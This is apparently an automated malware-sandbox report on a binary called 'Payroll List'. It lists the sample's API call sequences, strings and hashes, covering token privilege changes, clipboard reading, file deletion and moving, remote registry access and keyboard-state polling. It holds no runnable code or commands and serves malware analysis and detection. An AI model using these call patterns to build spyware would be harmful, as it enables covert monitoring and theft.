                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: 87028b6861bb72433647ef57287d33189af7773d32edcc75cf0253c51cfb5d59
                                                                    • Instruction ID: a7beb9fc3e470f1049f8b103e16ac757ecb46864972ac65abd9e43c3263b1068
                                                                    • Opcode Fuzzy Hash: 87028b6861bb72433647ef57287d33189af7773d32edcc75cf0253c51cfb5d59
                                                                    • Instruction Fuzzy Hash: C581ACB1840209EFDF119FA4DC89AEE7BB8FF18305F044219FD25AA561D7318E49DB61
                                                                    APIs
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00165FA6,?), ref: 00166ED8
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00165FA6,?), ref: 00166EF1
                                                                      • Part of subcall function 0016725E: __wsplitpath.LIBCMT ref: 0016727B
                                                                      • Part of subcall function 0016725E: __wsplitpath.LIBCMT ref: 0016728E
                                                                      • Part of subcall function 001672CB: GetFileAttributesW.KERNEL32(?,00166019), ref: 001672CC
                                                                    • _wcscat.LIBCMT ref: 00166149
                                                                    • _wcscat.LIBCMT ref: 00166167
                                                                    • __wsplitpath.LIBCMT ref: 0016618E
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001661A4
                                                                    • _wcscpy.LIBCMT ref: 00166209
                                                                    • _wcscat.LIBCMT ref: 0016621C
                                                                    • _wcscat.LIBCMT ref: 0016622F
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0016625D
                                                                    • DeleteFileW.KERNEL32(?), ref: 0016626E
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00166289
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00166298
                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 001662AD
                                                                    • DeleteFileW.KERNEL32(?), ref: 001662BE
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001662E1
                                                                    • FindClose.KERNEL32(00000000), ref: 001662FD
                                                                    • FindClose.KERNEL32(00000000), ref: 0016630B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                    • String ID: \*.*$p1Wu`KXu
                                                                    • API String ID: 1917200108-2866000061
                                                                    • Opcode ID: b66f254494f62864e1330c3249f9133dc00a03a033592e35d6edcffec2c503c8
                                                                    • Instruction ID: 398ddcaa9a86b3d9b7b8d361f9d649be09d58ebb552a000fbc7f58c473235af2
                                                                    • Opcode Fuzzy Hash: b66f254494f62864e1330c3249f9133dc00a03a033592e35d6edcffec2c503c8
                                                                    • Instruction Fuzzy Hash: 84511EB290811CAACB21EB91DC54DEF77BCAF15310F0901EAE585E2141DF369B99CFA4
                                                                    APIs
                                                                    • OpenClipboard.USER32(001BDC00), ref: 00176B36
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00176B44
                                                                    • GetClipboardData.USER32(0000000D), ref: 00176B4C
                                                                    • CloseClipboard.USER32 ref: 00176B58
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00176B74
                                                                    • CloseClipboard.USER32 ref: 00176B7E
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00176B93
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00176BA0
                                                                    • GetClipboardData.USER32(00000001), ref: 00176BA8
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00176BB5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00176BE9
                                                                    • CloseClipboard.USER32 ref: 00176CF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                    • String ID:
                                                                    • API String ID: 3222323430-0
                                                                    • Opcode ID: 98ac651fdc268635febb599ffe7c45d93e7529ff3640290c7f66bbc51b58d514
                                                                    • Instruction ID: c346b44cb67c768a5367acf955ad2c6bbd328bc78b0d94b8f517a1c92338abc6
                                                                    • Opcode Fuzzy Hash: 98ac651fdc268635febb599ffe7c45d93e7529ff3640290c7f66bbc51b58d514
                                                                    • Instruction Fuzzy Hash: E951A131244A01ABD305EF60ED86F6E77B8AF99B00F008029F69AD79D1DF70D945CB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016F62B
                                                                    • FindClose.KERNEL32(00000000), ref: 0016F67F
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016F6A4
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016F6BB
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0016F6E2
                                                                    • __swprintf.LIBCMT ref: 0016F72E
                                                                    • __swprintf.LIBCMT ref: 0016F767
                                                                    • __swprintf.LIBCMT ref: 0016F7BB
                                                                      • Part of subcall function 0014172B: __woutput_l.LIBCMT ref: 00141784
                                                                    • __swprintf.LIBCMT ref: 0016F809
                                                                    • __swprintf.LIBCMT ref: 0016F858
                                                                    • __swprintf.LIBCMT ref: 0016F8A7
                                                                    • __swprintf.LIBCMT ref: 0016F8F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 835046349-2428617273
                                                                    • Opcode ID: 2b1727223a3b70f6a63514af6e3c7cb84874f525edb220e67e594ec05672fffd
                                                                    • Instruction ID: a0437aa59982419282950e6dd557e47848366dee1ad5b6e383cf4eaf5535dc58
                                                                    • Opcode Fuzzy Hash: 2b1727223a3b70f6a63514af6e3c7cb84874f525edb220e67e594ec05672fffd
                                                                    • Instruction Fuzzy Hash: 62A10EB2408354ABC314EBA4DC86DAFB7ECAFA8704F44092EF595C3151EB34D959CB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00171B50
                                                                    • _wcscmp.LIBCMT ref: 00171B65
                                                                    • _wcscmp.LIBCMT ref: 00171B7C
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00171B8E
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00171BA8
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00171BC0
                                                                    • FindClose.KERNEL32(00000000), ref: 00171BCB
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00171BE7
                                                                    • _wcscmp.LIBCMT ref: 00171C0E
                                                                    • _wcscmp.LIBCMT ref: 00171C25
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00171C37
                                                                    • SetCurrentDirectoryW.KERNEL32(001D39FC), ref: 00171C55
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00171C5F
                                                                    • FindClose.KERNEL32(00000000), ref: 00171C6C
                                                                    • FindClose.KERNEL32(00000000), ref: 00171C7C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: 8c7073c89d30f44dee7f642c7575229b10f4e54c56e921778a0fb300cd5e0c14
                                                                    • Instruction ID: f58915aed3a13ffb5ccb7dc38705792a94649efcb06cf6e7bfbefa664f04d60b
                                                                    • Opcode Fuzzy Hash: 8c7073c89d30f44dee7f642c7575229b10f4e54c56e921778a0fb300cd5e0c14
                                                                    • Instruction Fuzzy Hash: 7A31E8325006197BCF159FF4EC49ADE77BC9F06320F108596E81AE3490EB70DF858A64
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00171CAB
                                                                    • _wcscmp.LIBCMT ref: 00171CC0
                                                                    • _wcscmp.LIBCMT ref: 00171CD7
                                                                      • Part of subcall function 00166BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00166BEF
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00171D06
                                                                    • FindClose.KERNEL32(00000000), ref: 00171D11
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00171D2D
                                                                    • _wcscmp.LIBCMT ref: 00171D54
                                                                    • _wcscmp.LIBCMT ref: 00171D6B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00171D7D
                                                                    • SetCurrentDirectoryW.KERNEL32(001D39FC), ref: 00171D9B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00171DA5
                                                                    • FindClose.KERNEL32(00000000), ref: 00171DB2
                                                                    • FindClose.KERNEL32(00000000), ref: 00171DC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 88a59f4e228ebe5ae1aa968c88eb14f2273ec259d3823d6902107b254f949f1f
                                                                    • Instruction ID: 51e0f3d6dd6320d94e9271f422fccc5722f12febfe4c1a910d81c682794594aa
                                                                    • Opcode Fuzzy Hash: 88a59f4e228ebe5ae1aa968c88eb14f2273ec259d3823d6902107b254f949f1f
                                                                    • Instruction Fuzzy Hash: 8C3108325006197ACF25AFE8EC4DADE77BD9F06324F108552E819A3190DB70DE85CF50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                    • API String ID: 2102423945-2023335898
                                                                    • Opcode ID: a9fc929894ea281d579eddfd39bb80a47fb23af6dcf7b5fbb00c3177684e3841
                                                                    • Instruction ID: f455905a4f2f748f9354521835264e1fa1f1c1c211d7fb42c6d8ff31fda363dd
                                                                    • Opcode Fuzzy Hash: a9fc929894ea281d579eddfd39bb80a47fb23af6dcf7b5fbb00c3177684e3841
                                                                    • Instruction Fuzzy Hash: C682B271D04229DFCF28CF98D8807AEB7B1BF49314F268169D819AB391E7749D91CB90
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 001709DF
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001709EF
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001709FB
                                                                    • __wsplitpath.LIBCMT ref: 00170A59
                                                                    • _wcscat.LIBCMT ref: 00170A71
                                                                    • _wcscat.LIBCMT ref: 00170A83
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00170A98
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170AAC
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170ADE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170AFF
                                                                    • _wcscpy.LIBCMT ref: 00170B0B
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00170B4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                    • String ID: *.*
                                                                    • API String ID: 3566783562-438819550
                                                                    • Opcode ID: 5df644c0603593ccf705a25455383693fab1cfe836c779398cd14af6f37a51cf
                                                                    • Instruction ID: 15c5cd93c946ba4746c4edcd04b9c6e6de54061167d3cd3b5be18761f42f45e9
                                                                    • Opcode Fuzzy Hash: 5df644c0603593ccf705a25455383693fab1cfe836c779398cd14af6f37a51cf
                                                                    • Instruction Fuzzy Hash: 3C6148B25043059FDB10EF60D8859AEB3E8FF99314F04891EFA89C7251DB31EA45CB92
                                                                    APIs
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
                                                                      • Part of subcall function 0015ABBB: GetLastError.KERNEL32(?,0015A69F,?,?,?), ref: 0015ABE1
                                                                      • Part of subcall function 0015ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0015A69F,?,?,?), ref: 0015ABF0
                                                                      • Part of subcall function 0015ABBB: HeapAlloc.KERNEL32(00000000,?,0015A69F,?,?,?), ref: 0015ABF7
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015AC0E
                                                                      • Part of subcall function 0015AC56: GetProcessHeap.KERNEL32(00000008,0015A6B5,00000000,00000000,?,0015A6B5,?), ref: 0015AC62
                                                                      • Part of subcall function 0015AC56: HeapAlloc.KERNEL32(00000000,?,0015A6B5,?), ref: 0015AC69
                                                                      • Part of subcall function 0015AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015A6B5,?), ref: 0015AC7A
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015A6D0
                                                                    • _memset.LIBCMT ref: 0015A6E5
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015A704
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A715
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0015A752
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015A76E
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A78B
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015A79A
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0015A7A1
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015A7C2
                                                                    • CopySid.ADVAPI32(00000000), ref: 0015A7C9
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015A7FA
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015A820
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015A834
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: f4b94fe31a0356dd939f5330285942948fe6ee4648f119afa450fbf46df7b5fd
                                                                    • Instruction ID: 40ce4f1d9278688685818e5081e56c84b4c79854c21705fc134ad45425b21d9d
                                                                    • Opcode Fuzzy Hash: f4b94fe31a0356dd939f5330285942948fe6ee4648f119afa450fbf46df7b5fd
                                                                    • Instruction Fuzzy Hash: F5516C71940209EFDF00CFA0DC44AEEBBB9FF05305F448229F921AB690DB359A09CB61
                                                                    APIs
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00165FA6,?), ref: 00166ED8
                                                                      • Part of subcall function 001672CB: GetFileAttributesW.KERNEL32(?,00166019), ref: 001672CC
                                                                    • _wcscat.LIBCMT ref: 00166441
                                                                    • __wsplitpath.LIBCMT ref: 0016645F
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00166474
                                                                    • _wcscpy.LIBCMT ref: 001664A3
                                                                    • _wcscat.LIBCMT ref: 001664B8
                                                                    • _wcscat.LIBCMT ref: 001664CA
                                                                    • DeleteFileW.KERNEL32(?), ref: 001664DA
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001664EB
                                                                    • FindClose.KERNEL32(00000000), ref: 00166506
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                    • String ID: \*.*$p1Wu`KXu
                                                                    • API String ID: 2643075503-2866000061
                                                                    • Opcode ID: 6305a76533cc2851c92400f2edd32b83dfd0c25ecccd47c8f69ea2b49297b151
                                                                    • Instruction ID: 447d21e62486af48739deec7d218d6a1ac9ffbc63ee9c0189bea8a278b376d89
                                                                    • Opcode Fuzzy Hash: 6305a76533cc2851c92400f2edd32b83dfd0c25ecccd47c8f69ea2b49297b151
                                                                    • Instruction Fuzzy Hash: A83180B2408384AAC721DBA48C859DBB7DCAF6A310F44096EF6D9C3141EB35D54DC7A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-4052911093
                                                                    • Opcode ID: 88bcb022ac72c482327691f15cef27e681889049a8179214b6581de202d26520
                                                                    • Instruction ID: 235b16c282fbed2675149281724a16bc805461e5d4dfe52b7180812ccb4615bc
                                                                    • Opcode Fuzzy Hash: 88bcb022ac72c482327691f15cef27e681889049a8179214b6581de202d26520
                                                                    • Instruction Fuzzy Hash: F8729475E04229DBDF28CF98D8407AEB7B5FF19310F15416AE815EB281DB709E81DB90
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0018328E
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0018332D
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001833C5
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00183604
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00183611
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: d9dc88edc7470f361b08045a38ce476b641301e97ec6b6663c9d939ffec02840
                                                                    • Instruction ID: 8f070fdd658258ec0adae8e3702423e78c5552a04100aa899754f9588974e4b6
                                                                    • Opcode Fuzzy Hash: d9dc88edc7470f361b08045a38ce476b641301e97ec6b6663c9d939ffec02840
                                                                    • Instruction Fuzzy Hash: A3E14A31604210AFCB14EF28D991E2ABBE9FF89710F08856DF55AD7261DB30EA05CF91
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00162B5F
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00162BE0
                                                                    • GetKeyState.USER32(000000A0), ref: 00162BFB
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00162C15
                                                                    • GetKeyState.USER32(000000A1), ref: 00162C2A
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00162C42
                                                                    • GetKeyState.USER32(00000011), ref: 00162C54
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00162C6C
                                                                    • GetKeyState.USER32(00000012), ref: 00162C7E
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00162C96
                                                                    • GetKeyState.USER32(0000005B), ref: 00162CA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: c56d1a69fd32c64cb6628a8249976cb629c75bfc9e7fe31c3e8c1341b753ffb6
                                                                    • Instruction ID: 76077ee99d3dfdacadc5465f687857305f211ee733e56d966cd44c5568be7a8a
